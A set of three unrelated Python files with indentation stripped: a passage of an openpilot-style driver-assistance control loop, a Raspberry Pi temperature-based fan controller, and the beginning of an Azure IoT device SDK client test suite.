if err not in m:
continue
csid = m.split("CSID:")[-1].split(" ")[0]
evt = {"0": EventName.roadCameraError, "1": EventName.wideRoadCameraError,
"2": EventName.driverCameraError}.get(csid, None)
if evt is not None:
self.events.add(evt)
# TODO: fix simulator
if not SIMULATION:
if not NOSENSOR:
if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000):
# Not show in first 1 km to allow for driving out of garage. This event shows after 5 minutes
self.events.add(EventName.noGps)
if not self.sm.all_alive(self.camera_packets):
self.events.add(EventName.cameraMalfunction)
if self.sm['modelV2'].frameDropPerc > 20:
self.events.add(EventName.modeldLagging)
if self.sm['liveLocationKalman'].excessiveResets:
self.events.add(EventName.localizerMalfunction)
# Check if all manager processes are running
not_running = {p.name for p in self.sm['managerState'].processes if not p.running}
if self.sm.rcv_frame['managerState'] and (not_running - IGNORE_PROCESSES):
self.events.add(EventName.processNotRunning)
# Only allow engagement with brake pressed when stopped behind another stopped car
speeds = self.sm['longitudinalPlan'].speeds
if len(speeds) > 1:
v_future = speeds[-1]
else:
v_future = 100.0
if CS.brakePressed and v_future >= self.CP.vEgoStarting \
and self.CP.openpilotLongitudinalControl and CS.vEgo < 0.3 and not self.last_model_long:
self.events.add(EventName.noTarget)
self.add_stock_additions_alerts(CS)
def add_stock_additions_alerts(self, CS):
self.AM.SA_set_frame(self.sm.frame)
self.AM.SA_set_enabled(self.enabled)
# alert priority is defined by code location, keeping is highest, then lane speed alert, then auto-df alert
if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long:
extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!'
extra_text_2 = '' if self.last_model_long else ', model may behave unexpectedly'
self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2)
return
if self.sm_smiskol['dynamicCameraOffset'].keepingLeft:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane')
return
elif self.sm_smiskol['dynamicCameraOffset'].keepingRight:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane')
return
ls_state = self.sm_smiskol['laneSpeed'].state
if ls_state != '':
self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state)
return
faster_lane = self.sm_smiskol['laneSpeed'].fastestLane
if faster_lane in ['left', 'right']:
ls_alert = 'laneSpeedAlert'
if not self.sm_smiskol['laneSpeed'].new:
ls_alert += 'Silent'
self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane))
return
df_out = self.df_manager.update()
if df_out.changed:
df_alert = 'dfButtonAlert'
if df_out.is_auto and df_out.last_is_auto:
# only show auto alert if engaged, not hiding auto, and time since lane speed alert not showing
if CS.cruiseState.enabled and not self.op_params.get('hide_auto_df_alerts'):
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)')
return
elif self.op_params.get('df_button_alerts').strip().lower() == 'off':
return
else:
if self.op_params.get('df_button_alerts').strip().lower() == 'silent':
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text))
return
def data_sample(self):
"""Receive data from sockets and update carState"""
# Update carState from CAN
can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True)
CS = self.CI.update(self.CC, can_strs)
self.sm.update(0)
self.sm_smiskol.update(0)
# all_valid = CS.canValid and self.sm.all_alive_and_valid()
if not self.initialized: # and (all_valid or self.sm.frame * DT_CTRL > 3.5 or SIMULATION):
if not self.read_only:
self.CI.init(self.CP, self.can_sock, self.pm.sock['sendcan'])
self.initialized = True
Params().put_bool("ControlsReady", True)
# Check for CAN timeout
if not can_strs:
self.can_rcv_error_counter += 1
self.can_rcv_error = True
else:
self.can_rcv_error = False
# When the panda and controlsd do not agree on controls_allowed
# we want to disengage openpilot. However the status from the panda goes through
# another socket other than the CAN messages and one can arrive earlier than the other.
# Therefore we allow a mismatch for two samples, then we trigger the disengagement.
if not self.enabled:
self.mismatch_counter = 0
# All pandas not in silent mode must have controlsAllowed when openpilot is enabled
if any(not ps.controlsAllowed and self.enabled for ps in self.sm['pandaStates']
if ps.safetyModel not in IGNORED_SAFETY_MODES):
self.mismatch_counter += 1
self.distance_traveled += CS.vEgo * DT_CTRL
return CS
def state_transition(self, CS):
"""Compute conditional state transitions and execute actions on state transitions"""
self.v_cruise_kph_last = self.v_cruise_kph
# if stock cruise is completely disabled, then we can use our own set speed logic
if not self.CP.pcmCruise:
self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.button_timers, self.enabled, self.is_metric)
elif CS.cruiseState.enabled:
self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH
# decrement the soft disable timer at every step, as it's reset on
# entrance in SOFT_DISABLING state
self.soft_disable_timer = max(0, self.soft_disable_timer - 1)
self.current_alert_types = [ET.PERMANENT]
# ENABLED, PRE ENABLING, SOFT DISABLING
if self.state != State.disabled:
# user and immediate disable always have priority in a non-disabled state
if self.events.any(ET.USER_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.USER_DISABLE)
elif self.events.any(ET.IMMEDIATE_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.IMMEDIATE_DISABLE)
else:
# ENABLED
if self.state == State.enabled:
if self.events.any(ET.SOFT_DISABLE):
self.state = State.softDisabling
self.soft_disable_timer = int(SOFT_DISABLE_TIME / DT_CTRL)
self.current_alert_types.append(ET.SOFT_DISABLE)
# SOFT DISABLING
elif self.state == State.softDisabling:
if not self.events.any(ET.SOFT_DISABLE):
# no more soft disabling condition, so go back to ENABLED
self.state = State.enabled
elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0:
self.current_alert_types.append(ET.SOFT_DISABLE)
elif self.soft_disable_timer <= 0:
self.state = State.disabled
# PRE ENABLING
elif self.state == State.preEnabled:
if not self.events.any(ET.PRE_ENABLE):
self.state = State.enabled
else:
self.current_alert_types.append(ET.PRE_ENABLE)
# DISABLED
elif self.state == State.disabled:
if self.events.any(ET.ENABLE):
if self.events.any(ET.NO_ENTRY):
self.current_alert_types.append(ET.NO_ENTRY)
else:
if self.events.any(ET.PRE_ENABLE):
self.state = State.preEnabled
else:
self.state = State.enabled
self.current_alert_types.append(ET.ENABLE)
self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last)
# Check if actuators are enabled
self.active = self.state == State.enabled or self.state == State.softDisabling
if self.active:
self.current_alert_types.append(ET.WARNING)
# Check if openpilot is engaged
self.enabled = self.active or self.state == State.preEnabled
def state_control(self, CS):
"""Given the state, this function returns an actuators packet"""
# Update VehicleModel
params = self.sm['liveParameters']
x = max(params.stiffnessFactor, 0.1)
sr = max(params.steerRatio, 0.1)
self.VM.update_params(x, sr)
lat_plan = self.sm['lateralPlan']
long_plan = self.sm['longitudinalPlan']
actuators = car.CarControl.Actuators.new_message()
actuators.longControlState = self.LoC.long_control_state
if CS.leftBlinker or CS.rightBlinker:
self.last_blinker_frame = self.sm.frame
# State specific actions
if not self.active:
self.LaC.reset()
self.LoC.reset(v_pid=CS.vEgo)
if not self.joystick_mode:
extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR, # TODO: just pass the services
'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': long_plan.hasLead}
# accel PID loop
pid_accel_limits = self.CI.get_pid_accel_limits(self.CP, CS.vEgo, self.v_cruise_kph * CV.KPH_TO_MS)
actuators.accel = self.LoC.update(self.active, CS, self.CP, long_plan, pid_accel_limits, extras_loc)
# interpolate lat plan to 100hz
self.lat_delay_offset += DT_CTRL
if self.sm.updated['lateralPlan']:
self.lat_delay_offset = 0.
# Steering PID loop and lateral MPC
lat_active = self.active and not CS.steerWarning and not CS.steerError and CS.vEgo > self.CP.minSteerSpeed
desired_curvature, desired_curvature_rate = get_lag_adjusted_curvature(self.CP, CS.vEgo,
lat_plan.psis,
lat_plan.curvatures,
lat_plan.curvatureRates,
self.lat_delay_offset)
actuators.steer, actuators.steeringAngleDeg, lac_log = self.LaC.update(lat_active, CS, self.CP, self.VM, params, self.last_actuators,
desired_curvature, desired_curvature_rate)
else:
lac_log = log.ControlsState.LateralDebugState.new_message()
if self.sm.rcv_frame['testJoystick'] > 0 and self.active:
actuators.accel = 4.0*clip(self.sm['testJoystick'].axes[0], -1, 1)
steer = clip(self.sm['testJoystick'].axes[1], -1, 1)
# max angle is 45 for angle-based cars
actuators.steer, actuators.steeringAngleDeg = steer, steer * 45.
lac_log.active = True
lac_log.steeringAngleDeg = CS.steeringAngleDeg
lac_log.output = steer
lac_log.saturated = abs(steer) >= 0.9
# Check for difference between desired angle and angle for angle based control
angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \
abs(actuators.steeringAngleDeg - CS.steeringAngleDeg) > STEER_ANGLE_SATURATION_THRESHOLD
if angle_control_saturated and not CS.steeringPressed and self.active:
self.saturated_count += 1
else:
self.saturated_count = 0
# Send a "steering required alert" if saturation count has reached the limit
if (lac_log.saturated and not CS.steeringPressed) or \
(self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT):
if len(lat_plan.dPathPoints):
# Check if we deviated from the path
# TODO use desired vs actual curvature
left_deviation = actuators.steer > 0 and lat_plan.dPathPoints[0] < -0.20
right_deviation = actuators.steer < 0 and lat_plan.dPathPoints[0] > 0.20
if left_deviation or right_deviation:
self.events.add(EventName.steerSaturated)
# Ensure no NaNs/Infs
for p in ACTUATOR_FIELDS:
attr = getattr(actuators, p)
if not isinstance(attr, Number):
continue
if not math.isfinite(attr):
cloudlog.error(f"actuators.{p} not finite {actuators.to_dict()}")
setattr(actuators, p, 0.0)
return actuators, lac_log
def update_button_timers(self, buttonEvents):
# increment timer for buttons still pressed
for k in self.button_timers.keys():
if self.button_timers[k] > 0:
self.button_timers[k] += 1
for b in buttonEvents:
if b.type.raw in self.button_timers:
self.button_timers[b.type.raw] = 1 if b.pressed else 0
def publish_logs(self, CS, start_time, actuators, lac_log):
"""Send actuators and hud commands to the car, send controlsstate and MPC logging"""
CC = car.CarControl.new_message()
CC.enabled = self.enabled
CC.active = self.active
CC.actuators = actuators
orientation_value = self.sm['liveLocationKalman'].orientationNED.value
if len(orientation_value) > 2:
CC.roll = orientation_value[0]
CC.pitch = orientation_value[1]
CC.cruiseControl.cancel = CS.cruiseState.enabled and (not self.enabled or not self.CP.pcmCruise)
if self.joystick_mode and self.sm.rcv_frame['testJoystick'] > 0 and self.sm['testJoystick'].buttons[0]:
CC.cruiseControl.cancel = True
hudControl = CC.hudControl
hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS)
hudControl.speedVisible = self.enabled
hudControl.lanesVisible = self.enabled
hudControl.leadVisible = self.sm['longitudinalPlan'].hasLead
hudControl.rightLaneVisible = True
hudControl.leftLaneVisible = True
recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown
ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not recent_blinker \
and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED
model_v2 = self.sm['modelV2']
desire_prediction = model_v2.meta.desirePrediction
if len(desire_prediction) and ldw_allowed:
right_lane_visible = self.sm['lateralPlan'].rProb > 0.5
left_lane_visible = self.sm['lateralPlan'].lProb > 0.5
l_lane_change_prob = desire_prediction[Desire.laneChangeLeft - 1]
r_lane_change_prob = desire_prediction[Desire.laneChangeRight - 1]
lane_lines = model_v2.laneLines
CAMERA_OFFSET = self.sm['lateralPlan'].cameraOffset
l_lane_close = left_lane_visible and (lane_lines[1].y[0] > -(1.08 + CAMERA_OFFSET))
r_lane_close = right_lane_visible and (lane_lines[2].y[0] < (1.08 - CAMERA_OFFSET))
hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close)
hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close)
if hudControl.rightLaneDepart or hudControl.leftLaneDepart:
self.events.add(EventName.ldw)
clear_event = ET.WARNING if ET.WARNING not in self.current_alert_types else None
alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric, self.soft_disable_timer])
self.AM.add_many(self.sm.frame, alerts)
current_alert = self.AM.process_alerts(self.sm.frame, clear_event)
if current_alert:
hudControl.visualAlert = current_alert.visual_alert
self.last_model_long = self.sm_smiskol['modelLongButton'].enabled
if not self.read_only and self.initialized:
# send car controls over can
self.last_actuators, can_sends = self.CI.apply(CC)
self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid))
CC.actuatorsOutput = self.last_actuators
force_decel = (self.sm['driverMonitoringState'].awarenessStatus < 0.) or \
(self.state == State.softDisabling)
# Curvature & Steering angle
params = self.sm['liveParameters']
steer_angle_without_offset = math.radians(CS.steeringAngleDeg - params.angleOffsetDeg)
curvature = -self.VM.calc_curvature(steer_angle_without_offset, CS.vEgo, params.roll)
# controlsState
dat = messaging.new_message('controlsState')
dat.valid = CS.canValid
controlsState = dat.controlsState
if current_alert:
controlsState.alertText1 = current_alert.alert_text_1
controlsState.alertText2 = current_alert.alert_text_2
controlsState.alertSize = current_alert.alert_size
controlsState.alertStatus = current_alert.alert_status
controlsState.alertBlinkingRate = current_alert.alert_rate
controlsState.alertType = current_alert.alert_type
controlsState.alertSound = current_alert.audible_alert
controlsState.canMonoTimes = list(CS.canMonoTimes)
controlsState.longitudinalPlanMonoTime = self.sm.logMonoTime['longitudinalPlan']
controlsState.lateralPlanMonoTime = self.sm.logMonoTime['lateralPlan']
controlsState.enabled = self.enabled
controlsState.active = self.active
controlsState.curvature = curvature
controlsState.state = self.state
controlsState.engageable = not self.events.any(ET.NO_ENTRY)
controlsState.longControlState = self.LoC.long_control_state
controlsState.vPid = float(self.LoC.v_pid)
controlsState.vCruise = float(self.v_cruise_kph)
controlsState.upAccelCmd = float(self.LoC.pid.p)
controlsState.uiAccelCmd = float(self.LoC.pid.i)
controlsState.ufAccelCmd = float(self.LoC.pid.f)
controlsState.cumLagMs = -self.rk.remaining * 1000.
controlsState.startMonoTime = int(start_time * 1e9)
controlsState.forceDecel = bool(force_decel)
controlsState.canErrorCounter = self.can_rcv_error_counter
lat_tuning = self.CP.lateralTuning.which()
if self.joystick_mode:
controlsState.lateralControlState.debugState = lac_log
elif self.CP.steerControlType == car.CarParams.SteerControlType.angle:
controlsState.lateralControlState.angleState = lac_log
elif lat_tuning == 'pid':
controlsState.lateralControlState.pidState = lac_log
elif lat_tuning == 'lqr':
controlsState.lateralControlState.lqrState = lac_log
elif lat_tuning == 'indi':
controlsState.lateralControlState.indiState = lac_log
elif lat_tuning == 'model':
controlsState.lateralControlState.modelState = lac_log
self.pm.send('controlsState', dat)
# carState
car_events = self.events.to_msg()
cs_send = messaging.new_message('carState')
cs_send.valid = CS.canValid
cs_send.carState = CS
cs_send.carState.events = car_events
self.pm.send('carState', cs_send)
# carEvents - logged every second or on change
if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev):
ce_send = messaging.new_message('carEvents', len(self.events))
ce_send.carEvents = car_events
self.pm.send('carEvents', ce_send)
self.events_prev = self.events.names.copy()
# carParams - logged every 50 seconds (> 1 per segment)
if (self.sm.frame % int(50. / DT_CTRL) == 0):
cp_send = messaging.new_message('carParams')
cp_send.carParams = self.CP
self.pm.send('carParams', cp_send)
# carControl
cc_send = messaging.new_message('carControl')
cc_send.valid = CS.canValid
cc_send.carControl = CC
self.pm.send('carControl', cc_send)
# copy CarControl to pass to CarInterface on the next iteration
self.CC = CC
def step(self):
start_time = sec_since_boot()
self.prof.checkpoint("Ratekeeper", ignore=True)
# Sample data from sockets and get a carState
CS = self.data_sample()
self.prof.checkpoint("Sample")
self.update_events(CS)
if not self.read_only and self.initialized:
# Update control state
self.state_transition(CS)
self.prof.checkpoint("State transition")
# Compute actuators (runs PID loops and lateral MPC)
actuators, lac_log = self.state_control(CS)
self.prof.checkpoint("State Control")
# Publish data
self.publish_logs(CS, start_time, actuators, lac_log)
self.prof.checkpoint("Sent")
self.update_button_timers(CS.buttonEvents)
def controlsd_thread(self):
while True:
self.step()
self.rk.monitor_time()
self.prof.display()
def main(sm=None, pm=None, logcan=None):
controls = Controls(sm, pm, logcan)
controls.controlsd_thread()
if __name__ == "__main__":
main()
|
pmac.py
|
from gpiozero import Button
from w1thermsensor import W1ThermSensor
from time import sleep
import RPi.GPIO as GPIO
import I2C_LCD_driver
import json
import threading
import os
import sys
config_file = os.path.join(sys.path[0], './config.json')
outsideTemp = 0
insideTemp = 0
fan_on = False
with open(config_file) as cf:
config = json.load(cf)
lcd = I2C_LCD_driver.lcd()
outsideSensor = W1ThermSensor(W1ThermSensor.THERM_SENSOR_DS18B20, config["outside_sensor_id"])
insideSensor = W1ThermSensor(W1ThermSensor.THERM_SENSOR_DS18B20, config["inside_sensor_id"])
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.output(17, GPIO.LOW)
def save_config():
with open(config_file, 'w') as cf:
json.dump(config, cf)
def turn_fan_on():
GPIO.output(17, GPIO.HIGH)
def turn_fan_off():
GPIO.output(17, GPIO.LOW)
def update_outsideTemp():
global outsideTemp
outsideTemp = outsideSensor.get_temperature(W1ThermSensor.DEGREES_F)
def update_insideTemp():
global insideTemp
insideTemp = insideSensor.get_temperature(W1ThermSensor.DEGREES_F)
def update_lcd():
global outsideTemp, insideTemp, config, fan_on
while True:
lcd.lcd_display_string(
"Outside Temp: %6.1f" % outsideTemp +
"Desired Temp: %6.1f" % config["low_temp"] +
"Inside Temp: %6.1f" % insideTemp +
"Fan on: %5s" % fan_on, 1)
sleep(.1)
lcd_thread = threading.Thread(target=update_lcd, args=())
lcd_thread.daemon = True
lcd_thread.start()
def lower_temp():
global config
if config["low_temp"] > 32.1:
config["low_temp"] -= 0.1
save_config()
def raise_temp():
global config
if config["low_temp"] < 100.1:
config["low_temp"] += 0.1
save_config()
def update_fan():
global outsideTemp, insideTemp, config, fan_on
if insideTemp - outsideTemp > 1 and insideTemp > float(config["low_temp"]):
fan_on = True
else:
fan_on = False
buttonDown = Button(4)
buttonUp = Button(14)
buttonDown.when_released = lower_temp
buttonUp.when_released = raise_temp
while True:
update_insideTemp()
update_outsideTemp()
update_fan()
if fan_on:
turn_fan_on()
else:
turn_fan_off()
sleep(1)
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
import six.moves.urllib as urllib
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURANCEConnectTests,
SharedIoTHubClientOCCURANCEDisconnectTests,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromSastokenTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromSastokenTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructre)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the handler manager, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
# cb_mock_init = mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback")
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientUpdateSasTokenTests(WaitsForEventCompletion):
# NOTE: Classes that inherit from this class must define some additional fixtures not included
# here, which will be specific to a device or module:
# - sas_config: returns an IoTHubPipelineConfiguration configured for Device/Module
# - uri: A uri that matches the uri in the SAS from sas_token_string fixture
# - nonmatching_uri: A uri that does NOT match to the uri in the SAS from sas_token_string
# - invalid_uri: A uri that is invalid (poorly formed, missing data, etc.)
@pytest.fixture
def device_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# device id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
device_id = token_uri_pieces[2]
return device_id
@pytest.fixture
def hostname(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# hostname from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
return hostname
@pytest.fixture
def sas_client(self, client_class, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return client_class(mqtt_pipeline, http_pipeline)
@pytest.fixture
def sas_client_manual_cb(
self, client_class, mqtt_pipeline_manual_cb, http_pipeline_manual_cb, sas_config
):
mqtt_pipeline_manual_cb.pipeline_configuration = sas_config
http_pipeline_manual_cb.pipeline_configuration = sas_config
return client_class(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def new_sas_token_string(self, uri):
# New SASToken String that matches old device id and hostname
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
new_token_string = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote(signature, safe=""),
expiry=int(time.time()) + 3600,
)
return new_token_string
@pytest.mark.it(
"Creates a new NonRenewableSasToken and sets it on the PipelineConfig, if the new SAS Token string matches the existing SAS Token's information"
)
def test_updates_token_if_match_vals(self, sas_client, new_sas_token_string):
old_sas_token_string = str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken)
# Update to new token
sas_client.update_sastoken(new_sas_token_string)
# Sastoken was updated
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) == new_sas_token_string
)
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) != old_sas_token_string
)
@pytest.mark.it("Begins a 'reauthorize connection' pipeline operation")
def test_calls_pipeline_reauthorize(self, sas_client, new_sas_token_string, mqtt_pipeline):
sas_client.update_sastoken(new_sas_token_string)
assert mqtt_pipeline.reauthorize_connection.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'reauthorize connection' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, sas_client_manual_cb, mqtt_pipeline_manual_cb, new_sas_token_string
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection
)
sas_client_manual_cb.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the 'reauthorize connection' pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
sas_client_manual_cb,
mqtt_pipeline_manual_cb,
new_sas_token_string,
client_error,
pipeline_error,
):
# NOTE: If/When the MQTT pipeline is updated so that the reauthorize op waits for
# reconnection in order to return (currently it just waits for the disconnect),
# there will need to be additional connect-related errors in the parametrization.
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
sas_client_manual_cb.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Raises a ClientError if the client was created with an X509 certificate instead of SAS"
)
def test_created_with_x509(self, mocker, sas_client, new_sas_token_string):
# Modify client to seem as if created with X509
x509_client = sas_client
